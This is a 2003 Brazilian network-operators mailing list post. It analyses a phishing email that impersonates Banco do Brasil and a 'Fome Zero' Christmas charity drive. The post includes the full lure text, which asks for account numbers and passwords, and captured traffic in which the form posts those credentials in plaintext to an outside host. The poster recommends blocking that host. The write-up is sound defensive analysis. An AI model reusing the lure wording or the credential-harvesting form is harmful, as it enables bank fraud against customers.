[GTER] Esse esta' quase perfeito : [Fwd: {Spam?} Natal Banco do Brasil.]

Marcio Gomes mpglista at microlink.com.br
Thu Dec 11 23:23:37 -02 2003 

  Pessoal,

Existe alguem do BB na lista ?

Essa mensagem demonstra um certo "refino" na tecnica de "engenharia 
social" .

Verifiquem que o codigo html nao e' visivel e nao  consegui com uma 
rapida verificacao
identificar o destino do post p/ bloqueio.

Quando se da' submit no form do email, o seguinte trafego estranho e' 
gerado :


23:01:53.286227 209.10.239.151.80 > XXX.YYY.ZZZ.WWW.55269: P 
113:482(369) ack 695 win 64841 <nop,nop,timestamp 34485484 191277929> (DF)
23:01:53.286284 XXX.YYY.ZZZ.WWW.55269 > 209.10.239.151.80: . ack 482 win 
6432 <nop,nop,timestamp 191277950 34485484> (DF)

Apos uma verificacao no que foi enviado :

POST /images/login.asp HTTP/1.1
Host: www.hcdonline.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) 
Gecko/20030208 Netscape/7.02
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us, en;q=0.50
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Cookie: ASPSESSIONIDCSTACTDT=HDNHKMDDLEPPGKJOGKOHDILM
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

Valor+a+ser+doado.=01&agencia=&conta=&senha=&senhacc=&botaoEntra.x=-58&botaoEntra.y=-61POST 
/images/login.asp HTTP/1.1
Host: www.hcdonline.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) 
Gecko/20030208 Netscape/7.02
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us, en;q=0.50
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Cookie: ASPSESSIONIDCSTACTDT=HDNHKMDDLEPPGKJOGKOHDILM
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

Valor+a+ser+doado.=01&agencia=123456&conta=7890000&senha=00000000&senhacc=111111&botaoEntra.x=29&botaoEntra.y=16
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Como podem ver a senha, e dados da agencia e' passado em arquivo plano 
p/ o host www.hcdonline.com

www.hcdonline.com has address 209.10.239.151

Dessa forma sugiro o bloqueio imediato ao ip 209.10.239.151, bem como a 
www.hcdonline.com

Entretanto ficou a duvida de como foi implementado o codigo html ( nao 
sou um expert em java e outros ) ja' que nao consigo ver nada
na mensagem e muito menos o post  p/ /images/login.asp HTTP/1.1. 
Infelizmente estou atarefado, mas diante de uma situacao um
pouco diferente das que estamos acostumados, achei interessante postar o 
quanto antes.

Apos o submit e' aberta a pagina real do BB.. em https.

[]s
Marcio Gomes












Received: from cliente (MG149131120.user.veloxzone.com.br 
[200.149.131.120] (may be forged)) XXXXXXXXXXXXXXXXXXX with SMTP id 
hBBKxnh01101; Thu, 11 Dec 2003 18:59:53 -0200
Message-Id: <200312112059.hBBKxnh01101 at gavea-eth0.pop-rio.com.br>
From: "bb" <bb at bancobrasil.com.br>
To: "marcos1" <marcos1 at microlink.com.br>
Subject: {Spam?} Natal Banco do Brasil.
Date: Thu, 11 Dec 03 18:26:04 Hor. de verão leste da Am. Sul
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary= 
"----=_NextPart_000_0090_D5D815D0.E2CF3A9C"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
X-MailScanner-Information: Please contact the ISP for more information
X-MailScanner: Found to be clean
X-MailScanner-SpamCheck: spam, SpamAssassin (score=7, required 5, 
BASE64_ENC_TEXT, BAYES_60, FORGED_MUA_OUTLOOK, HTML_EVENT_UNSAFE, 
HTML_JAVASCRIPT, HTML_TAG_BALANCE_TABLE, HTML_WIN_FOCUS, INVALID_DATE, 
MIME_BOUND_NEXTPART, MIME_HTML_ONLY)
X-MailScanner-SpamScore: sssssss



Voltar página inicial <http://www.bb.com.br/appbb/portal/fz/index.jsp>
Voltar página inicial 
<http://www.bb.com.br/appbb/portal/fz/index.jsp>null 
<http://www.cidadania-e.com.br/>

Caro cliente BANCO DO BRASIL,

       O Banco  do  Brasil  em parceria  com  o  Governo  federal da a 
oportunidade de seus clientes  ajudarem o programa natal sem fome sem 
precisar desembolsar nada para isso o cliente só precisa se cadastrar 
para ajudar.
       Para cada cliente cadastrado o banco vai doar alimentos,roupas e 
brinquedos para pessoas carentes, não deixe de se cadastrar e fazer o 
natal de milhares de pessoas mais feliz!!!

            Para se  "cadastrar", basta informar os dados de sua conta 
corrente em nosso formulário ao lado, que é dotado de segurança de alto 
nível a qual garante que seus dados vão ser codificados para que só a 
tecnologia de nosso sistema possa ter acesso.
       O BRASIL QUE COME AJUDANDO O BRASIL QUE TEM FOME.

www.fomezero.gov.br <http://www.fomezero.gov.br/>

Titular
 
 
Agência
Conta
 
Senha Eletrônica
Senha do Cartão
 

 

Banco do Brasil preocupado com seus clientes, preocupado em fazer amigos.

 

Banco do Brasil Empresa parceira do Fome Zero.
Relatório Anual <http://www.bb.com.br/appbb/portal/ra/index.jsp>Voltar 
página inicial <http://www.bb.com.br/appbb/portal/fz/index.jsp>

. política de privacidade 
<http://www.bb.com.br/appbb/portal/bb/pp/index.jsp> . internet grátis 
<http://www.bb.com.br/appbb/portal/cm/intg/index.jsp> .

More information about the gter mailing list